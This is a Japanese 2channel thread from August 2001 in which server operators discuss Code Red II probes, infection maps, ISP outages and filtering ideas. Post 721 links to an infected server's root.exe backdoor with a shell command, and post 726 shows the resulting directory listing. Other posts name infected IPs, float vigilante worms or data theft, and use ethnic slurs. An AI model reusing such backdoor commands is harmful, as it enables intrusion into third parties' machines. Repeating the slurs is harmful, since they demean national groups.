ゲラゲラ   ・・・って笑い事じゃねー

608 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:55
父さん!丸がでっかいです!

609 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:56
>>606

他国に比べて個人のWin2kユーザが多いせいもあるんだろか?

610 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:58
発信源は確実にこのでかい丸の中のどこかだな

611 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:58
>>606
日本の姿が見えないYO!

612 :名無しさん@お腹いっぱい。:2001/08/06(月) 20:59
>>606
爆心地が日本海あたりなのがなげやりでイイ!

613 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:00
>>606
Java版がまた笑える!

614 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:04
CodeRedII、海からやってきた説。
やっぱり荒波に揉まれて鍛えられてるから強いのかな。
母なる海ってなんでも生むんだね

615 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:04
あぁああ、今日もこんなに来るのか・・・鬱だ。

でもこれって、『ここのカギ掛かってませんよ』って知らせにきてる様なものか?

616 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:05
爆心地はやっぱりあの国ですかねぇ。

617 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:06
アラスカに佇むCodeRed。
オーストラリアのど真ん中に佇むCodeRed。
なんだか風流だね

618 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:06
ゴジラ

619 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:07
絶対外人もこれ見てゲラゲラ笑ってるよな

620 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:08
つうか、頼むから感染さんといてと隔離されたりして・・・

621 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:08
広島、長崎を思い出します

622 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:10
ぢゃあ、今日がピークで、次は8.15だに。

623 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:11
>>606
アイスランドから南アフリカまで...

624 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:13
自動的にログを読んで感染元を調べるワームとか作ったら面白ろそう。

625 :名無しさん@お腹いっぱい。 :2001/08/06(月) 21:15
シマンテックさんお願いですからもうウィルスまくの止めてください。
norton買いますから〜

626 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:15
くそ暑い登校日を思いだします
♪あーゆるすーまじ原爆をー

627 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:18
中国さんお願いですからもうウィルスまくの止めてください。
ネギ買いますから〜

628 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:19
>>606
全て、カンコックのせいです。
国連を通じて、賠償請求をしましょう!
マジで!

629 :通販ファン:2001/08/06(月) 21:22
おまえウザイよ。
くんなよ。

おれ、WIN98なんだから・・・

630 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:23
ガ━━(゚д゚;)━━ン!ニホンちゃん大ピンチ

631 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:25
激しくワラタ

632 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:25
アメ公が中国に報復攻撃しようとしたら近隣諸国に誤爆してるに一票

633 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:27
これ笑うしかねーよ

円の中心はK国かな?

634 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:29
今日が何の日か考えると、この原爆もどきは洒落にならんな

635 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:31
アクセスしてきた鯖に応急処置するハニーポット、本気で作りたいよ

636 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:31
>>606
気に入った。
空く恥部デスクトップに貼り付けるよ(ワラ

637 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:33
>>633

日本だとおもってたが、Java版で表示される緯度・経度はソウル。

http://www.security.nl/misc/codered-stats/geodist.html

N37.53, E127.0

638 :在日:2001/08/06(月) 21:34
うわー、立場ね〜 ( ´Д`)

639 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:36
CODEREDより怖いウィルス出現?
http://news.yahoo.co.jp/headlines/reu/010806/int/11082501_japan_47216_1.html

640 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:36
東京、大阪のカウントはそれぞれ1, 2、ソウルが5236だ。
ただ単に、報告してねえだけじゃんか!?

つまり、報告後には、爆弾が2つってこった・・・

641 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:37
>>639
CodeRedIIじゃん

642 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:38
>>639
ていうか、亀ニュースなのでは。「週末にかけて云々・・・」

643 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:38
>>639
X君の事でしょ、それ。

644 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:39
dで来たパケット逆引きしてるだけじゃないのかな?
211系と61系が目立つことに意味はありますか?

645 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:43
この不正アクセスには対処法はありますか?ゾヌはちゃんと防いでくれてるのですか?

646 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:43

すいません既出でした・・・逝って来ます

647 : :2001/08/06(月) 21:43
XXXは第一オクテットかぶってるご近所さんを攻めていくようだ
lang見てる所といい 明らかにYellowを徹底的に痛めつけようと
しているね。
んでもって、その目的はほぼ達成されてる  w

648 ::2001/08/06(月) 21:44
    8月4日深夜から8月6日1時30分までの間、インターネット接続遅延障害が発生しました。
    原因は、インターネットからの「Code Red ワーム」攻撃対応でルータに処理負荷がかかり、
    通常データ処理に遅延が発生したためです。
    依然としてワーム攻撃は続いておりますが、内部設定変更により、これらワームの
    影響を受けないように対策を講じました。
    長時間にわたりご迷惑をお掛けしましたことを、深くお詫び申し上げます

俺が使ってるプロバイダ。昨日は遅すぎて使い物にならんかった。

649 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:45
PC立ち上げて一時間で40件も80番ポートにお客さんが来たよヽ(´ー`)ノ

650 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:46
>>644
うちは210系と*.icc.ne.jp、*.dti.ne.jpから来てる。
犯された鯖は自IPの近辺をスキャンするから、まぁ納得。
ちなみにうちはdti。

651 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:46
う〜ん、中国、韓国に次いで、アメリカ辺りが怪しいのかな。
こんなでかい原爆落としたの誰だよ!

652 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:47
>>649
普通だよ

653 :650:2001/08/06(月) 21:47
>>647
納得&感心。
ゴミレススマソ

654 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:47
参考。*.jpのIPブロック。
http://www.nic.ad.jp/jp/regist/dns/doc/jp-addr-block.html

655 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:49
実態よりも、観測点に依存するわけかもね。
K国のは出張パケットが多いか、国内に観測点があるのか。

656 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:50
日本アンドコリアがホワイトとチャンコロ争いのとばっちり食らってるのか。
笑えねー

657 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:52
>>654
その中で*.chとカブってるのがあったら悲惨なワケだ

658 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:53
*.cn?

659 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:55
NNNはEN版だからチャイナっぽいね、でその報復がXXXと
ついでにウザイJAPとチョソコも逝っとけ って感じ?  (´Д`;)

660 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:58
ヤンはチナとジャプとチョソの区別がつかないに一票。

661 :名無しさん@お腹いっぱい。:2001/08/06(月) 21:58
まあ日本時間で、土曜の夜に発動っていうのは、
明らかに最初からアジア狙いだったんだろうね

662 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:00
とりあえず黄色っぽいの狙っとけって感じか

663 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:01
Xばら撒いたのは明らかに英語圏の奴だろ
これに限らずindexserverのオーバーフローは
大抵OSの言語決め撃ちしてくるから、
俺がX飛ばして来た奴HTTPで見た結果は
100% 中国、日本、カンコック だよ
英語版からX来た人居るの???

664 :名無しさん@お腹いっぱい。 :2001/08/06(月) 22:01
中国が、コードレッドver4作って、アメリカに報復に出たら、更に面白くなるね。
あ〜あ、中国とアメリカが核戦争したら、
間違いなく日本も滅ぶね・・・。

665 :663:2001/08/06(月) 22:04
あああ。。。これ見りゃ一目瞭然じゃん ((((;´Д`)
やっぱアメ公こええ。。。。。
http://www.security.nl/misc/codered-stats/geodist.gif

666 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:05
うちの国別アクセス頻度は、ダントツで日本、続いて韓国、台湾、
アメリカ、オランダの順だった。
ちょこちょこフランス、ニュージーランドとかもあったけど

わざわざ調べてらんないから、逆引きできたIPのみだけど。

667 :不吉な数字:2001/08/06(月) 22:08
cn入れ忘れた。台湾の次ぐらい

668 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:08
CodeRedに汚染されている鯖のIP晒してもいいですか?

669 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:09
>>668
あんまり良くないです

670 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:11
>>668
やめなさい!と言明しときます。

671 :668:2001/08/06(月) 22:12
晒すのは辞めます・・・

しかし5時間で75アクセス。
index.htmlよりもアクセスが多い・・・鬱だ死のう

672 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:12
>>668
バックドア付きってことで、よしましょう。

673 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:12
CodeRed駆逐ウィルスCodeBlue作ってヨ

674 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:13
>>665
北京?あたりの赤丸がでかすぎて、日韓の状況がわからん

675 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:14
ダイアルアップで繋げて30分で30件もキターヨ

676 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:14
>>673
ちょちょっと、作ったけどどうする?

677 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:15
しかし、トラフィックの無駄だよなぁ・・・

678 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:15
>>673 そして世界中の Code Blue が君のサーバを叩きまくる、と。

679 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:16
おもいっきり日本のネットショップからアタック受けたので、
「感染してますよ」ってメールしたけど返事がありません。
晒したいです。

680 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:16
>>674
633から読み返せ

681 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:16
その調子じゃ、その内Code indigoとか訳わからんものまで出てくるぞ

682 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:17
あんまり意味ないが、
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=kr
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=cn
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=tw
から来るパケット全遮断にするかな。暫く。

683 :名無しさん@お腹いっぱい。 :2001/08/06(月) 22:18
ぐはっ REDに混ざってポート1024までアメ公に舐められた (泣
フルコネクトでガリガリっとさ、、、、、ウツダ  -_-

684 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:19
感染したまま放置しているヴァカはマジ氏ね!!!!!!!!!!!!

685 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:22
しかし、しみじみ述べていいですか…

今回の一連の騒ぎは私がネットワークに関する事に興味をもってから初めての
出来事です。ちょうど土日にかかったということもあり、なんとも言えないラ
イブ感を感じました。

7/20頃から会社のサーバーに届き始めたパケットを観察し始めて以来…あ
たかも小学生時代に、カブト虫の幼虫がさなぎになり、そして成虫へと変態し
ていくさまを観察したときのような…

このたびの出来事、そしてこのスレでの皆さんとの語らいは、私のこれからの
人生にとって、忘れられないものとなるでしょう…

686 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:23
誰がしみじみ述べていいと言った

687 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:23
(・∀・)イイ!!

688 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:24
>>682
こいつらと日本て、ほとんど重なってるわけか

689 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:25
>>679
こっちは某所のストリーミングサーバーから来たよ。
速い回線につないでるから余計迷惑だゴルァ!
管理者にメールしても連絡なし。
IP からプロバイダ調べて「切り離せ!」と電話しといた。

690 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:26
べーつーにー、画面書き変わんないしー、もーまんたーいじゃーん?
ちょっとアタックされたからってメールしてきて、マジウザーい。

というのが、世のIIS管理者の総意です。

691 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:28
>>679
企業のサーバは晒してもいいんじゃない?

692 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:28
>>685
ワラタ
もうネタにするしかないもんな。ここまで来たら。

693 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:28
ウィルス作者とIIS管理者は死刑でいいよね?

694 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:28
>>688
そう、ウザイことにね。
krやcnなんかには、10.xx.xx.xxを割当てりゃいいのに。

695 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:28
>>690
バックドアしかけられてそれかい。
はげしく逝ってよし!!
いや、逝く前にサーバはずしとけ。

696 : :2001/08/06(月) 22:29
テレホ近づくにつれてアクセス順調に増えてるな〜

697 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:30
>>694
192.168.0.0
あたりでいいんじゃないかな。

698 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:32
>>691
止めろって。
どうせ、届いたパケットみて Backdoor から DDoS エージェント
埋め込んでるヴァカとかいるだろうけど、わざわざここで入り口
晒して助長することはない。

699 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:32
>>697
いっそのこと127.0.0.1に統一してもらおうか。

700 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:33
顧客情報を抜き取ってライバル会社に売り込みましょう。

701 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:33
そういや、ラーメンはどうやって沈静化したのかな?

702 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:34
うちには *.co.jp からのアクセスは殆どこなくなりました。
プロバがOCNだとまだあるのか?

703 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:35
>>690
別にDoSの固定砲台になったっていいよな〜。
もってけroot.exe〜。うぜ〜。

704 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:36
>>698
激しく同意。とはいえ、黙ってても、
「自分でパケット吐いてる」時点で十分晒し者なんだが。

705 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:36


  
    で これらのIP採取できたら最初にどうやって遊ぶ?

706 :名無しさん@お腹いっぱい。 :2001/08/06(月) 22:36
このスレだけニュー即並に廻ってるね  w

707 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:37
>>703
「こーどれっど?何それ?」 が真の管理者

708 :ななし:2001/08/06(月) 22:37
default.idaフォルダーのなかにcode black作って入れたら
明らかにlogが変化してきた。

709 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:38
>>705 トップページを 2ch に飛ばすよう仕組むとか。

710 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:39
>>707
管理者ゼロ名、利用者一名・・・

711 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:39
211.44.6.12
コーリアからきた氏ね。

712 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:39
もう誰でも良いから感染マシンのディレクトリ消しまくるワームばら撒いてくれ
それ位しか ほんわかIIS管理者叩き起こす手はないだろ!

713 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:39
>>709
DDoSで2chが使えなくって自分が不便だYo!!

714 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:40
>>712
いいのんか?

715 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:40
http://www.security.nl/misc/codered-stats/detailed-v2.html
沈静化の兆し?

716 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:40
でっかい赤丸、東京かと思ったらソウルだった。

717 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:41
>>716
そう ル。

718 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:42
この寒さ・・・ここはアラスカか?

719 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:42
MSのサイトって大きすぎて何処見たらいいのかわかんないんだよね
これくらいは軽く言ってのけなければ IIS管理者とはいえません。

720 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:43
>>719
ワラタ

721 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:43
http://210.120.39.3/c/inetpub/scripts/root.exe?/c+dir
ここみてみ。

722 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:43
>>715
Code Red V2は、そうかも。

723 :IIS使い:2001/08/06(月) 22:43
会社の鯖にIE6beta入れちゃったっ   エヘ

724 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:44
>>721
よせ。

725 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:44
>>721
見ましたが何か?

726 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:45
>>722
Directory of c:\

2000-10-16 04:05a 0 CONFIG.BAK
2000-10-16 05:36a <DIR> Documents and Settings
2000-10-16 03:54a <DIR> down
2000-10-27 12:54p <DIR> HanGame
2000-10-17 10:56p <DIR> HNC
2000-10-16 05:14a <DIR> Inetpub
2001-08-06 06:58p <DIR> inmul
2000-10-16 03:32a <DIR> My Documents
2000-10-18 03:37p <DIR> My Music
2000-10-16 05:31a <DIR> orant
2000-10-16 03:58a <DIR> orawin95
2001-08-03 12:40p <DIR> Program Files
2000-10-16 04:12a 427 SCANDISK.LOG
2000-10-16 03:10a <DIR> WINDOWS
2000-11-06 12:54p <DIR> WINNT
2000-10-29 10:44p <DIR> WORK
2 File(s) 427 bytes
14 Dir(s) 3,986,743,296 bytes free

727 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:45
>>721
ここで引っかかる奴はいないっつの

728 :727:2001/08/06(月) 22:45
立場ねぇ〜

729 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:46
CGI でさ、接続もとの ISP にメール送りつけるっての作れない?
それを /default.ida にマップしておけんかね?

730 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:48
>>729
前も書いたが止めとけ。
ゴミトラフィック発生装置になるだけ。

731 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:49
>>729

アクセス毎に自動で送るとプロバイダの管理者が死んじまう。

プロバイダ別にIPアドレス・アクセス時刻の一覧でも自動作成して、
あとは手作業で送れば?

732 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:50
>>729
メールばくだーんになっちまうからヤメレ。
訴えられるぞ。

733 :名無しさん@お腹いっぱい。:2001/08/06(月) 22:51
>>721
半角板に貼ってあるのと同じですか?

734 :名無しさん@お腹いっぱい。:2001/08/06(月) 23:02
>>715
感染期を終えて、backdoorが潜伏しちまうと思うと、素直に喜べんですね・・・

735 :名無しさん@お腹いっぱい。:2001/08/06(月) 23:03
ある意味、名スレになってきたカモ

736 :名無しさん@お腹いっぱい。:2001/08/06(月) 23:06
うちのログ見ると沈静化してるようにはとても見えんが…

737 :なー:2001/08/06(月) 23:07
明日の朝にはパート2逝きそうだね。

738 :名無しさん@お腹いっぱい。:2001/08/06(月) 23:12
>>736
激しく同意!!

みんなはどうやってログとってるの?
http-access.logを見てる?
それともcgiでログとってる?

739 :名無しさん@お腹いっぱい。:2001/08/06(月) 23:15
CodeRed のトラフィックで崩壊に近い状態のプロバイダ
INTERLINK は言い訳メールを顧客に3本打ってきたが、
復活しないまま日付変わりそうだな。

740 :なー:2001/08/06(月) 23:15
>>738
access_logだよ。

741 ::2001/08/06(月) 23:16
サーバ乗っ取られますか?

742 :名無しさん@お腹いっぱい。:2001/08/06(月) 23:17
>>738
簡易ハニーポット&たまにPacMonPro

743 :なー:2001/08/06(月) 23:18
>>458にもあるけど
http://www.eeye.com/html/advisories/coderedII.zip
XXXの逆汗リスト。解説(英語)も付いてる。読んでごらん。

744 :名無しさん@お腹いっぱい。:2001/08/06(月) 23:20
>>739
Airnet.ne.jp は復活。

745 :名無しさん@お腹いっぱい。:2001/08/06(月) 23:26
セキュリティホール memo 復活してる。
Code Red II 関連リンク集もあり。見に逝くべし。

746 :なー:2001/08/06(月) 23:31
>>745
を。さんきゅー。

747 :名無しさん@お腹いっぱい。:2001/08/06(月) 23:34
今日一日のCodeREのLOGが2MBだよ、、
日に日に増えてる気がする。
皆さんのところも増えています?

748 :名無しさん@お腹いっぱい。:2001/08/06(月) 23:38
http://www.zdnet.co.jp/news/0108/04/b_0803_11.html
ワラタ。

749 :なー:2001/08/06(月) 23:39
>>747
増えてるけどそんな多くないよ。

750 :なー:2001/08/06(月) 23:40
>>748
来週末にはアキバでも手に入るらしいよ>ソーダ

751 :名無しさん@お腹いっぱい。:2001/08/06(月) 23:43
>>747

@NIFTY(旧INFOWEB)だけど、23時すこし過ぎたあたりからピタリととまった。

ユーザが寝たか潜伏したかと思ったが、まだ増えとるという話もあるのなら、
プロバ側で対策したかな?(だとしたら偉い)

752 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:00
倒めたやインターリンクは
ルーターのARPキャッシュfullで通信障害になったと見た

753 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:00
>>749
>>751
ども有難う。
何とか落ち着いてくれることを祈りましょう。

754 :( ´Д`):2001/08/07(火) 00:12
日本の超有名なビデオカードメーカーの
鯖もやられてるみたいですね。

23時台にアクセスがあったぞ。
連絡してやるべきか・・・

755 :751:2001/08/07(火) 00:13
>>751
自己フォローです。
減っただけで、まだ居てました。ひとまず落ち着いてはきたんだろうか?

起きたらどうなってるかなあ・・・つうわけでお寝みです。

756 :なー:2001/08/07(火) 00:15
>>754どこ?

757 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:17
>>754
あちですか?まさかと思ってアクセスしてみたら一部NotFound・・・

758 :名無しさん@お腹いっぱい。 :2001/08/07(火) 00:19
>>751
ルータがいくつかオチて、件数が減ってるだけだったらヤだな…。

759 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:21
Code Red買いに行ってくる。
コンビニにあるかなぁ。
http://www.zdnet.co.jp/news/0108/04/b_0803_11.html

760 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:22
無いよ。普通のマウンテンデューぐらいならあるかもしれんが。
まあコンビニにはきついか

761 :Ψ(`▽´)Ψ:2001/08/07(火) 00:28
某i・○データもサポートソフトのとこが回線速度遅かったけどredcoad?ISDNで1M落とすのに30分かかった(´Д`;
あとポート137叩いてくる奴がいて鬱。

762 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:29
>>751
昼頃ニフティーに報告した。
最初は全く相手にされなかったので
インターリンクの話を出して、

「ユーザーが通報しているにもかかわらず
IPすら聞かないで追い払って
もしインターリンクみたいな事が起こったら
どうするおつもりですか?」

って言ったらやっと重い腰をあげた

763 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:33
>>762

ひどいなあ。帯域は落ちてなかったが、8/6の昼でそれでは。実際は土曜から
始まったのに・・・
私も8/5に駄目元でサポートメールを送ったが、きっと読んでないのか。

764 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:35
御苦労様 >>762
でも、今現在も来てる。>@nifty

765 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:35
みんなでCode Redのアクセス数を自慢し合おう。
俺んとこは昨日751回だぜ。

766 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:37
>>765
不毛だから俺はいい・・・
またあのでかい赤丸思いだしたよ

767 :762:2001/08/07(火) 00:41
サポートの名前覚えてるから
ニフティー落ちたら騒いでやる。

っていうか、コードレッドの話をしたら
「そのような話は(ユーザーから)あがってませんが」
といってたよ。

768 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:42
でもこれ↓って有効だよねぇ。実行ボランティア団体とか出てきそうだよ

http://ton.2ch.net/test/read.cgi?bbs=sec&key=989706177&st=815&to=815&nofirst=true

769 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:42
xxx 223
NNN 10
total 233

770 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:44
>>769
 不毛だからやめよう。スレ荒し状態になってしまう。

771 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:46
これっていつ終わるの?

772 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:47
CodeRedにこれ以上亜種がでなかったら9月末まで。
まあ亜種は出るだろう

773 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:47
さあ?
>>768
 それ、何?

774 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:47
>>771
終わらない。インターネットはこういうものになる。

775 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:47
>>767

762です。ユーザから上がってなくても、サーバ運用してる部門がログを見て
気づくような気がすんだけど B-(

なんか、「メールが設定できませんとか」、「つながりませーん」の相手しかした
ことの無い部門に電話しちゃったとか・・・

それともヤッパリ、会社ごとDQNなんすかねえ・・・
個人ユーザの利用レベルだと、ダウンタイムや帯域の問題、あまり起きない
プロバイダなんだけど。

明日、沈静化してなかったら、このウン百件のログなどを証拠に送るか・・・

776 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:49
>>768
net send 使ったんだなきっと。
うまいこと考えたな、これなら漏れレベルでも
簡単にできる。

777 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:50
>>775
俺は電話しても無駄だと思ったから、最初からログ添付で
J-COMにメール送ったよ。しかも2回。今後新たな「J-COM
なのに感染野郎」が増えたらまた送るかも

778 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:51
プロバイダー側ではどんな対策が可能なの?
default.ida宛てでNNNN..かXXXXがパラメータなら無視とか設定できるの?

779 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:51
15時から見て300人目のお客様
61.202.82.37

780 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:52
>>776
最初の頃、net send やってみたけど、通らなかったよ。
なんか方法があるのかな。

781 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:52
>>779
IP晒しはやめなさい。CodeRedIIなんだろうから

782 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:53
.sgからも来た。

783 :名無しさん@お腹いっぱい。:2001/08/07(火) 00:55
code redが来たら踊る人形プログラムでも作ってみようかな。

784 :762:2001/08/07(火) 00:58
>>777

なるほど。
ときに@NIFTYだと、まずセキュリティ関係の苦情窓口はどこじゃ〜、てWebページ
で探したけど、見つからず「その他の連絡先」にWebフォームでって事に・・・推して
知るべし。

そして今日のアタック、1/3は〜ppp.infoweb.ne.jp で自分とこなんですけど〜
ま、いま@NIFTYバッシングしてどうかなるわけでもないし、明日連絡してみよ。
whoisででもadminのe-mail調べてみるかな。

785 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:00
>>778

・感染したサイトの管理者にメール出す。電話をかける。手紙を出す。
・感染したサイトの接続を切ってしまう。
・感染したサイトから port 80 への外部アクセスをフィルタで捨てる。
・IDSで GET /XXXXXXXXXXXX 見つけたらRSTを両側に強制発行してTCPコネクションを切る。

こんなとこ?

786 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:02
"GET /default.ida?XXXXXX (省略) HTTP/1.0" 200 - "-" "-"
"GET /default.ida?XXXXXX(省略) HTTP/1.0" 404 280 "-" "-"

おなじxxxパターンなのに200になるケースと404になるケースが
あるようだけど

787 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:03
>>780

>default.idaの名前のプログラムを持っていってもらって感染ホストの
>バックドアから入り警告のメッセージをコンソール出力する

>Code Red Worm が作成したバックドアを使用して,NET SEND する
>CGI プログラムのことですね.

こんな記事がシー研に載ってましたよ

788 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:05
>>778
・兎に角まず自分とこの客で Code Red 持ちの奴を特定し、遮断。
・ホストの繋がっていない IP 宛てのパケットなど、不要なトラフィックを
 なるべく根元のルータで落とす
・transparent proxy などの使用を一時的に止める
位かな?

789 :762:2001/08/07(火) 01:08
whoisとグーグルで調べて中国系の企業に直接
管理者に教えてあげましたよ。
○○○○○ELECTRONICS

790 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:11
>>787
 なるほど、よく分かった。ありがとう。
バックドア使って相手のCMD.EXEからnet sendするわけか。
 いい手だけど、バックドア使うのはやだしなあ。

791 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:12
>>786
200 : OK
400 : リクエストの文法エラー
404 : URLが見つからない
408 : タイムアウト

以上4つのケースが確認されてるみたいよ

792 :おやまぁ:2001/08/07(火) 01:12
CodeRED、コード部分だけのリクエストに変わりました。
頻度が多い、、、なんだこりゃ。一分間に100発程度で連続です。
ひぃ〜〜〜〜〜〜、明日はどうなるんじゃ!

207.33.111.32 - - [07/Aug/2001:00:30:21 +0900] "HEAD /%63%67%69%2d%62%69%6e/%6d%61%69%6c%6c%69%73%74%2e%70%6c HTTP/1.0" 404 0

793 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:13
>>792
しかもメソッドがHEADだね。面白くなってまいりました

794 :おやまぁ:2001/08/07(火) 01:15
でも最後に "Mozilla/4.7 [en] (Win95; U)"って残ってんなぁ。
ダレカが悪さしてるとみたが。

795 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:15
>>792
変臭が出るとは予想してたがマジか。ていうか、変種というより別モンではないか?
IISだけがターゲットじゃないかも・・・

796 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:16
>>792
今度の新種はがらっと変わったね。リクエストヘッダは取ってる?
特に、Content-lengthは見れる?

797 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:16
>>791 Thanks
でもApache使っていて200があるのは、どうしてだ?

798 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:17
つーか別物だね

799 :名無しさん@お腹いっぱい。:2001/08/07(火) 01:17
>>752
某電力系プロバイダは、ルーティングの設定が元々おかしくて、
CodeRed の攻撃パケットの一部が宛先不明パケットとして
変なループ作って輻輳を起こしていた。
夕方電話で指摘して解消に向かった。これまではそういうパケット
は TTL が 0 になるまでぐるぐるして捨てられてて気が
つかなかったらしい(笑)

